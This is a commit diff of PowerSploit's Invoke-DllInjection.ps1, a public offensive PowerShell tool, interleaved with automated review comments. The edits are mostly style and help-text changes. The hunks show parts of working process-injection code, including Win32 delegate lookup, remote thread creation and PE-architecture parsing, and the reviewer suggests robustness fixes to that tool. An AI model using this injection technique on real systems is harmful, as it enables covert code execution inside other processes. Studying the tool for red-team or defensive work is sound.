authorDave Hull <dave.hull@tanium.com>2017-09-08 16:33:11 -0500
committerDave Hull <dave.hull@tanium.com>2017-09-08 16:33:11 -0500
commit6eb3c6f281f0812a103283d1da80be14bb04f944 (patch)
treecfe2e46596ef251274e954c267c5634d62991da2 /CodeExecution/Invoke-DllInjection.ps1
parentbf652bcd261c2c74445c2aa1b4e283c4bf167109 (diff)
parent3d0d32d9ee6af70f0dfd5ecfe809a49a65d6822d (diff)
Merge branch 'dev' of github.com:PowerShellMafia/PowerSploit into dev
Diffstat (limited to 'CodeExecution/Invoke-DllInjection.ps1')
-rw-r--r--CodeExecution/Invoke-DllInjection.ps160
1 files changed, 33 insertions, 27 deletions
diff --git a/CodeExecution/Invoke-DllInjection.ps1 b/CodeExecution/Invoke-DllInjection.ps1
index 369d606..d23e989 100644
--- a/CodeExecution/Invoke-DllInjection.ps1
+++ b/CodeExecution/Invoke-DllInjection.ps1
@@ -5,15 +5,19 @@ function Invoke-DllInjection
Injects a Dll into the process ID of your choosing.
-PowerSploit Function: Invoke-DllInjection
-Author: Matthew Graeber (@mattifestation)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
+PowerSploit Function: Invoke-DllInjection
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
.DESCRIPTION
Invoke-DllInjection injects a Dll into an arbitrary process.
+It does this by using VirtualAllocEx to allocate memory the size of the
+DLL in the remote process, writing the names of the DLL to load into the
+remote process spacing using WriteProcessMemory, and then using RtlCreateUserThread
+to invoke LoadLibraryA in the context of the remote process.
.PARAMETER ProcessID
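Review bot: The new .DESCRIPTION lines have two wording slips that will be read by Get-Help users: `writing the names of the DLL to load into the remote process spacing` should read `writing the name of the DLL to load into the remote process space`. The surrounding comment-based help block starts and ends outside this hunk.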
@@ -40,6 +44,8 @@ Use the '-Verbose' option to print detailed information.
http://www.exploit-monday.com
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [CmdletBinding()]
Param (
[Parameter( Position = 0, Mandatory = $True )]
[Int]
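Review bot: Suppressing PSShouldProcess (the attribute added above `[CmdletBinding()]`) silences the analyzer instead of giving this state-changing function the -WhatIf/-Confirm guard the rule asks for, so an operator cannot dry-run or be prompted before another process is modified. Since `[CmdletBinding()]` is being introduced here anyway, prefer `[CmdletBinding(SupportsShouldProcess = $True)]` and gate the body with `if ($PSCmdlet.ShouldProcess("PID $ProcessID", "Inject $Dll")) { ... }`, after which the SuppressMessage attribute can be dropped. The rest of the Param block and the body that would be gated lie outside this hunk.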
@@ -59,7 +65,7 @@ http://www.exploit-monday.com
{
Throw "Process does not exist!"
}
-
+
# Confirm that the path to the dll exists
try
{
@@ -79,11 +85,11 @@ http://www.exploit-monday.com
Param
(
[OutputType([Type])]
-
+
[Parameter( Position = 0)]
[Type[]]
$Parameters = (New-Object Type[](0)),
-
+
[Parameter( Position = 1 )]
[Type]
$ReturnType = [Void]
@@ -98,7 +104,7 @@ http://www.exploit-monday.com
$ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
$MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
$MethodBuilder.SetImplementationFlags('Runtime, Managed')
-
+
Write-Output $TypeBuilder.CreateType()
}
@@ -107,11 +113,11 @@ http://www.exploit-monday.com
Param
(
[OutputType([IntPtr])]
-
+
[Parameter( Position = 0, Mandatory = $True )]
[String]
$Module,
-
+
[Parameter( Position = 1, Mandatory = $True )]
[String]
$Procedure
@@ -128,7 +134,7 @@ http://www.exploit-monday.com
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
$HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
-
+
# Return the address of the function
Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
}
@@ -142,43 +148,43 @@ http://www.exploit-monday.com
[String]
$Path
)
-
+
# Parse PE header to see if binary was compiled 32 or 64-bit
$FileStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read)
-
+
[Byte[]] $MZHeader = New-Object Byte[](2)
$FileStream.Read($MZHeader,0,2) | Out-Null
-
+
$Header = [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)
if ($Header -ne 'MZ')
{
$FileStream.Close()
Throw 'Invalid PE header.'
}
-
+
# Seek to 0x3c - IMAGE_DOS_HEADER.e_lfanew (i.e. Offset to PE Header)
$FileStream.Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null
-
+
[Byte[]] $lfanew = New-Object Byte[](4)
-
+
# Read offset to the PE Header (will be read in reverse)
$FileStream.Read($lfanew,0,4) | Out-Null
- $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | % { $_.ToString('X2') } ) -join ''))
-
+ $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | ForEach-Object { $_.ToString('X2') } ) -join ''))
+
# Seek to IMAGE_FILE_HEADER.IMAGE_FILE_MACHINE
$FileStream.Seek($PEOffset + 4, [System.IO.SeekOrigin]::Begin) | Out-Null
[Byte[]] $IMAGE_FILE_MACHINE = New-Object Byte[](2)
-
+
# Read compiled architecture
$FileStream.Read($IMAGE_FILE_MACHINE,0,2) | Out-Null
- $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | % { $_.ToString('X2') } ) -join '')
+ $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | ForEach-Object { $_.ToString('X2') } ) -join '')
$FileStream.Close()
-
+
if (($Architecture -ne '014C') -and ($Architecture -ne '8664'))
{
Throw 'Invalid PE header or unsupported architecture.'
}
-
+
if ($Architecture -eq '014C')
{
Write-Output 'X86'
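Review bot: Get-PEArchitecture opens `$FileStream` but only closes it on the explicit `Throw 'Invalid PE header.'` path and after the architecture bytes are read; any exception in between leaks the file handle until finalization, and the `[Int]` cast of `$PEOffset` appears to yield a negative value for an e_lfanew with the high bit set, which would make the following `Seek` throw before `Close()` is reached. The three `Read` calls also discard their return value via `| Out-Null`, so a short read on a truncated file is silently treated as valid header bytes. Wrap the body in try/finally so the stream is always closed, and compare each `Read` result with the requested count. The function's header and its final X86/X64 output branch lie outside this hunk, so only the rewritten opening and the new closing are shown.
```powershell
$FileStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read)
try
{
    [Byte[]] $MZHeader = New-Object Byte[](2)
    if (($FileStream.Read($MZHeader, 0, 2) -ne 2) -or ([System.Text.AsciiEncoding]::ASCII.GetString($MZHeader) -ne 'MZ'))
    {
        Throw 'Invalid PE header.'
    }

    # … unchanged: seek to 0x3c, read $lfanew / $PEOffset, seek to the machine field, read $IMAGE_FILE_MACHINE, compute $Architecture …
    # (apply the same "-ne <count>" check to the $lfanew and $IMAGE_FILE_MACHINE reads; drop the inline $FileStream.Close() calls)

    if (($Architecture -ne '014C') -and ($Architecture -ne '8664'))
    {
        Throw 'Invalid PE header or unsupported architecture.'
    }
}
finally
{
    $FileStream.Close()
}
# … unchanged: X86 / X64 output branch …
```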
@@ -193,7 +199,7 @@ http://www.exploit-monday.com
}
}
-
+
# Get addresses of and declare delegates for essential Win32 functions.
$OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess
$OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])
@@ -307,7 +313,7 @@ http://www.exploit-monday.com
{
Throw "Unable to launch remote thread. NTSTATUS: 0x$($Result.ToString('X8'))"
}
-
+
$VirtualFreeEx.Invoke($hProcess, $RemoteMemAddr, $Dll.Length, 0x8000) | Out-Null # MEM_RELEASE (0x8000)
# Close process handle
@@ -317,7 +323,7 @@ http://www.exploit-monday.com
# Extract just the filename from the provided path to the dll.
$FileName = (Split-Path $Dll -Leaf).ToLower()
- $DllInfo = (Get-Process -Id $ProcessID).Modules | ? { $_.FileName.ToLower().Contains($FileName) }
+ $DllInfo = (Get-Process -Id $ProcessID).Modules | Where-Object { $_.FileName.ToLower().Contains($FileName) }
if (!$DllInfo)
{